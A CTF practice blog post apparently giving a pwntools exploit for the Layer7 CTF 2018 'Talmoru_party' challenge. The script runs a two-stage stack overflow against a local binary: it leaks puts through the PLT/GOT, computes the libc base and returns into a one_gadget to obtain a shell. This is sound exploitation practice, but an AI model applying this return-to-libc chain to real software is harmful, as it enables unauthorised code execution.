System/Pwnable Practice

Layer7 CTF 2018 Talmoru_party!~

JeonYoungSin 2019. 8. 2. 23:46

exploit.py


from pwn import *


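# Two-stage return-to-libc run against the local CTF binary: stage 1 makes the
# program print the resolved address of puts so the libc load address can be
# computed, stage 2 overwrites the return address with an address inside libc.
#
# NOTE(review): the hard-coded code addresses below only hold if ./vuln is a
# 32-bit, non-PIE binary built without a stack canary -- confirm with checksec.
# A stack protector or PIE on the main image would each invalidate this chain.
#
# Payloads are built from bytes literals: p32() returns bytes, so prefixing
# it with a str (as the original listing did) raises TypeError on Python 3.

p = process("./vuln")
e = ELF("./vuln")
libc = e.libc  # libc that the loaded ELF is linked against on this machine

# Presumably menu entry 3 is the one that reaches the unbounded input prompt.
p.sendlineafter(b">>", b"3")

pr = 0x0804884b      # presumably a one-word "pop; ret" gadget in ./vuln -- verify
restart = 0x80486E0  # presumably code in ./vuln that shows the prompt again -- verify

# 0x40 + 4 filler bytes precede the words that the script treats as the
# overwritten return address (likely a 0x40-byte buffer plus saved EBP).
padding = b"A" * (0x40 + 4)

# Stage 1: call puts(puts@got) through the PLT, skip the argument with the
# pop/ret gadget, then continue at `restart` so a second input is accepted.
payload = padding
payload += p32(e.plt['puts'])
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)

p.sendlineafter(b"plz!\n", payload)
p.recvuntil(b"Good bye~~!\n")

# recvn() waits for exactly four bytes; a plain recv(4) may return fewer and
# make u32() fail on a short read.
puts_addr = u32(p.recvn(4))

libc_base = puts_addr - libc.symbols['puts']

# Candidate offsets into libc, as listed by the author (the first value appears
# twice in the original). They are specific to one libc build and are
# meaningless against any other version.
one_gadget = [0x3d0d5, 0x3d0d5, 0x3d0d9, 0x3d0e0, 0x67a7f, 0x67a80, 0x137e5e, 0x137e5f]
one_addr = libc_base + one_gadget[0]

# Stage 2: same filler, return address replaced by the computed libc address.
payload2 = padding
payload2 += p32(one_addr)
p.sendlineafter(b"plz", payload2)
p.interactive()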